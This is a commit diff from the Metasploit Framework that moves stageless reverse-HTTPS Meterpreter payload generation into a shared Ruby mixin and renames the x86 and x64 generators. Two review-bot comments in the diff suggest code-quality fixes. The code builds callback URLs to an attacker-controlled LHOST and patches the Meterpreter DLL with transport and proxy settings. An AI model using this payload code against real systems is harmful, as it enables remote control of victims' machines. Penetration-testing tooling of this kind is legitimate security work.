Refactor of code to reduce duplication
Add mixin for the stageless http preparation
bug/bundler_fix
parent
f8851551c5
commit
26792975eb
|
@ -0,0 +1,73 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
require 'rex/parser/x509_certificate'
|
||||
|
||||
module Msf
|
||||
|
||||
##
|
||||
#
|
||||
# Helper functionality for handling of stageless http(s) payloads
|
||||
#
|
||||
##
|
||||
|
||||
module Handler::ReverseHttp::Stageless
|
||||
|
||||
include Msf::Payload::Windows::VerifySsl
|
||||
|
||||
def initialize_stageless
|
||||
register_options([
|
||||
OptString.new('EXTENSIONS', [false, "Comma-separated list of extensions to load"]),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def generate_stageless(&block)
|
||||
checksum = generate_uri_checksum(Handler::ReverseHttp::UriChecksum::URI_CHECKSUM_CONN)
|
||||
rand = Rex::Text.rand_text_alphanumeric(16)
|
||||
url = "https://#{datastore['LHOST']}:#{datastore['LPORT']}/#{checksum}_#{rand}/"
|
||||
|
||||
unless block_given?
|
||||
raise ArgumentError, "Stageless generation requires a block argument"
|
||||
end
|
||||
|
||||
# invoke the given function to generate the architecture specific payload
|
||||
block.call(url) do |dll|
|
||||
|
||||
# TODO: figure out this bit
|
||||
# patch the target ID into the URI if specified
|
||||
#if opts[:target_id]
|
||||
# i = dll.index("/123456789 HTTP/1.0\r\n\r\n\x00")
|
||||
# if i
|
||||
# t = opts[:target_id].to_s
|
||||
# raise "Target ID must be less than 5 bytes" if t.length > 4
|
||||
# u = "/B#{t} HTTP/1.0\r\n\r\n\x00"
|
||||
# print_status("Patching Target ID #{t} into DLL")
|
||||
# dll[i, u.length] = u
|
||||
# end
|
||||
#end
|
||||
|
||||
verify_cert_hash = get_ssl_cert_hash(datastore['StagerVerifySSLCert'],
|
||||
datastore['HandlerSSLCert'])
|
||||
|
||||
Rex::Payloads::Meterpreter::Patch.patch_passive_service!(dll,
|
||||
:url => url,
|
||||
:ssl => true,
|
||||
:ssl_cert_hash => verify_cert_hash,
|
||||
:expiration => datastore['SessionExpirationTimeout'].to_i,
|
||||
:comm_timeout => datastore['SessionCommunicationTimeout'].to_i,
|
||||
:ua => datastore['MeterpreterUserAgent'],
|
||||
:proxyhost => datastore['PROXYHOST'],
|
||||
:proxyport => datastore['PROXYPORT'],
|
||||
:proxy_type => datastore['PROXY_TYPE'],
|
||||
:proxy_username => datastore['PROXY_USERNAME'],
|
||||
:proxy_password => datastore['PROXY_PASSWORD'])
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
end
|
|
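Review bot: The module header says `# Helper functionality for handling of stageless http(s) payloads`, but `generate_stageless` hard-codes the `https://` scheme when it builds `url` and passes `:ssl => true` to `patch_passive_service!`, so a plain reverse_http stageless payload that includes this mixin would still be handed an https URL and an SSL flag it cannot use. Either narrow the comment to https, or let the caller decide with `def generate_stageless(ssl = true, &block)`, `url = "#{ssl ? 'https' : 'http'}://#{datastore['LHOST']}:#{datastore['LPORT']}/#{checksum}_#{rand}/"` and `:ssl => ssl,` so the scheme and the flag cannot drift apart. The `:ssl_cert_hash` line also deserves a comment that the value presumably comes back nil when `StagerVerifySSLCert` is unset, in which case the generated payload will not pin the handler's certificate and will accept any TLS endpoint at that address — confirm that is the intended default and say so, e.g. `# nil when StagerVerifySSLCert is off: the payload then does not pin the handler cert`. Three smaller points: the `block_given?` guard would be clearer as the first statement, before the checksum and URL are computed; the local `rand` shadows `Kernel#rand` (`uri_suffix` reads better); and the commented-out target_id block under `# TODO: figure out this bit` was moved verbatim into the shared helper, so if it is not going to be revived it should be dropped rather than duplicated.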
@ -51,7 +51,7 @@ module Payload::Windows::StagelessMeterpreter
|
|||
asm
|
||||
end
|
||||
|
||||
def generate_stageless_meterpreter(url = nil)
|
||||
def generate_stageless_x86(url = nil)
|
||||
dll, offset = load_rdi_dll(MeterpreterBinaries.path('metsrv', 'x86.dll'))
|
||||
|
||||
conf = {
|
||||
|
|
|
@ -51,7 +51,7 @@ module Payload::Windows::StagelessMeterpreter_x64
|
|||
asm
|
||||
end
|
||||
|
||||
def generate_stageless_meterpreter(url = nil)
|
||||
def generate_stageless_x64(url = nil)
|
||||
dll, offset = load_rdi_dll(MeterpreterBinaries.path('metsrv', 'x64.dll'))
|
||||
|
||||
conf = {
|
||||
|
|
|
@ -37,7 +37,7 @@ module Metasploit3
|
|||
def generate
|
||||
# blank LHOST indicates bind payload
|
||||
url = "tcp://:#{datastore['LPORT']}"
|
||||
generate_stageless_meterpreter(url)
|
||||
generate_stageless_x86(url)
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
@ -5,18 +5,18 @@
|
|||
|
||||
require 'msf/core'
|
||||
require 'msf/core/handler/reverse_https'
|
||||
require 'msf/core/handler/reverse_http/stageless'
|
||||
require 'msf/core/payload/windows/stageless_meterpreter'
|
||||
require 'msf/base/sessions/meterpreter_x86_win'
|
||||
require 'msf/base/sessions/meterpreter_options'
|
||||
require 'rex/parser/x509_certificate'
|
||||
|
||||
module Metasploit3
|
||||
module Metasploit4
|
||||
|
||||
CachedSize = :dynamic
|
||||
|
||||
include Msf::Payload::Windows::StagelessMeterpreter
|
||||
include Msf::Handler::ReverseHttp::Stageless
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
include Msf::Payload::Windows::VerifySsl
|
||||
|
||||
def initialize(info = {})
|
||||
|
||||
|
@ -31,48 +31,13 @@ module Metasploit3
|
|||
'Session' => Msf::Sessions::Meterpreter_x86_Win
|
||||
))
|
||||
|
||||
register_options([
|
||||
OptString.new('EXTENSIONS', [false, "Comma-separated list of extensions to load"]),
|
||||
], self.class)
|
||||
initialize_stageless
|
||||
end
|
||||
|
||||
def generate
|
||||
checksum = generate_uri_checksum(Handler::ReverseHttp::UriChecksum::URI_CHECKSUM_CONN)
|
||||
rand = Rex::Text.rand_text_alphanumeric(16)
|
||||
url = "https://#{datastore['LHOST']}:#{datastore['LPORT']}/#{checksum}_#{rand}/"
|
||||
|
||||
generate_stageless_meterpreter(url) do |dll|
|
||||
|
||||
# TODO: figure out this bit
|
||||
# patch the target ID into the URI if specified
|
||||
#if opts[:target_id]
|
||||
# i = dll.index("/123456789 HTTP/1.0\r\n\r\n\x00")
|
||||
# if i
|
||||
# t = opts[:target_id].to_s
|
||||
# raise "Target ID must be less than 5 bytes" if t.length > 4
|
||||
# u = "/B#{t} HTTP/1.0\r\n\r\n\x00"
|
||||
# print_status("Patching Target ID #{t} into DLL")
|
||||
# dll[i, u.length] = u
|
||||
# end
|
||||
#end
|
||||
|
||||
verify_cert_hash = get_ssl_cert_hash(datastore['StagerVerifySSLCert'],
|
||||
datastore['HandlerSSLCert'])
|
||||
|
||||
Rex::Payloads::Meterpreter::Patch.patch_passive_service!(dll,
|
||||
:url => url,
|
||||
:ssl => true,
|
||||
:ssl_cert_hash => verify_cert_hash,
|
||||
:expiration => datastore['SessionExpirationTimeout'].to_i,
|
||||
:comm_timeout => datastore['SessionCommunicationTimeout'].to_i,
|
||||
:ua => datastore['MeterpreterUserAgent'],
|
||||
:proxyhost => datastore['PROXYHOST'],
|
||||
:proxyport => datastore['PROXYPORT'],
|
||||
:proxy_type => datastore['PROXY_TYPE'],
|
||||
:proxy_username => datastore['PROXY_USERNAME'],
|
||||
:proxy_password => datastore['PROXY_PASSWORD'])
|
||||
end
|
||||
|
||||
# generate a stageless payload using the x86 version of
|
||||
# the stageless generator
|
||||
generate_stageless(&method(:generate_stageless_x86))
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
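Review bot: `include Msf::Payload::Windows::VerifySsl` in this payload module looks redundant once `Msf::Handler::ReverseHttp::Stageless` is included a few lines above it, because that new mixin carries its own `include Msf::Payload::Windows::VerifySsl`; assuming the line survives on the new side (the rendering does not show which side it is on), it can be dropped, and the same applies to the x64 module further down. The duplicate is harmless — a module already in the ancestor chain is not included twice — but it hides where `get_ssl_cert_hash` now comes from, since the certificate-hash lookup moved out of `generate` into the mixin. The slimmed-down `generate` would also benefit from a one-line comment saying what it delegates, e.g. `# URL construction, cert pinning and metsrv patching live in Handler::ReverseHttp::Stageless`.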
@ -37,7 +37,7 @@ module Metasploit3
|
|||
|
||||
def generate
|
||||
url = "tcp6://#{datastore['LHOST']}:#{datastore['LPORT']}?#{datastore['SCOPEID']}"
|
||||
generate_stageless_meterpreter(url)
|
||||
generate_stageless_x86(url)
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
@ -36,7 +36,7 @@ module Metasploit3
|
|||
|
||||
def generate
|
||||
url = "tcp://#{datastore['LHOST']}:#{datastore['LPORT']}"
|
||||
generate_stageless_meterpreter(url)
|
||||
generate_stageless_x86(url)
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
@ -5,18 +5,18 @@
|
|||
|
||||
require 'msf/core'
|
||||
require 'msf/core/handler/reverse_https'
|
||||
require 'msf/core/handler/reverse_http/stageless'
|
||||
require 'msf/core/payload/windows/x64/stageless_meterpreter'
|
||||
require 'msf/base/sessions/meterpreter_x64_win'
|
||||
require 'msf/base/sessions/meterpreter_options'
|
||||
require 'rex/parser/x509_certificate'
|
||||
|
||||
module Metasploit3
|
||||
module Metasploit4
|
||||
|
||||
CachedSize = :dynamic
|
||||
|
||||
include Msf::Payload::Windows::StagelessMeterpreter_x64
|
||||
include Msf::Handler::ReverseHttp::Stageless
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
include Msf::Payload::Windows::VerifySsl
|
||||
|
||||
def initialize(info = {})
|
||||
|
||||
|
@ -31,48 +31,13 @@ module Metasploit3
|
|||
'Session' => Msf::Sessions::Meterpreter_x64_Win
|
||||
))
|
||||
|
||||
register_options([
|
||||
OptString.new('EXTENSIONS', [false, "Comma-separated list of extensions to load"]),
|
||||
], self.class)
|
||||
initialize_stageless
|
||||
end
|
||||
|
||||
def generate
|
||||
checksum = generate_uri_checksum(Handler::ReverseHttp::UriChecksum::URI_CHECKSUM_CONN)
|
||||
rand = Rex::Text.rand_text_alphanumeric(16)
|
||||
url = "https://#{datastore['LHOST']}:#{datastore['LPORT']}/#{checksum}_#{rand}/"
|
||||
|
||||
generate_stageless_meterpreter(url) do |dll|
|
||||
|
||||
# TODO: figure out this bit
|
||||
# patch the target ID into the URI if specified
|
||||
#if opts[:target_id]
|
||||
# i = dll.index("/123456789 HTTP/1.0\r\n\r\n\x00")
|
||||
# if i
|
||||
# t = opts[:target_id].to_s
|
||||
# raise "Target ID must be less than 5 bytes" if t.length > 4
|
||||
# u = "/B#{t} HTTP/1.0\r\n\r\n\x00"
|
||||
# print_status("Patching Target ID #{t} into DLL")
|
||||
# dll[i, u.length] = u
|
||||
# end
|
||||
#end
|
||||
|
||||
verify_cert_hash = get_ssl_cert_hash(datastore['StagerVerifySSLCert'],
|
||||
datastore['HandlerSSLCert'])
|
||||
|
||||
Rex::Payloads::Meterpreter::Patch.patch_passive_service!(dll,
|
||||
:url => url,
|
||||
:ssl => true,
|
||||
:ssl_cert_hash => verify_cert_hash,
|
||||
:expiration => datastore['SessionExpirationTimeout'].to_i,
|
||||
:comm_timeout => datastore['SessionCommunicationTimeout'].to_i,
|
||||
:ua => datastore['MeterpreterUserAgent'],
|
||||
:proxyhost => datastore['PROXYHOST'],
|
||||
:proxyport => datastore['PROXYPORT'],
|
||||
:proxy_type => datastore['PROXY_TYPE'],
|
||||
:proxy_username => datastore['PROXY_USERNAME'],
|
||||
:proxy_password => datastore['PROXY_PASSWORD'])
|
||||
end
|
||||
|
||||
# generate a stageless payload using the x64 version of
|
||||
# the stageless generator
|
||||
generate_stageless(&method(:generate_stageless_x64))
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
@ -37,7 +37,7 @@ module Metasploit4
|
|||
|
||||
def generate
|
||||
url = "tcp://#{datastore['LHOST']}:#{datastore['LPORT']}"
|
||||
generate_stageless_meterpreter(url)
|
||||
generate_stageless_x64(url)
|
||||
end
|
||||
|
||||
end
|
||||
|
|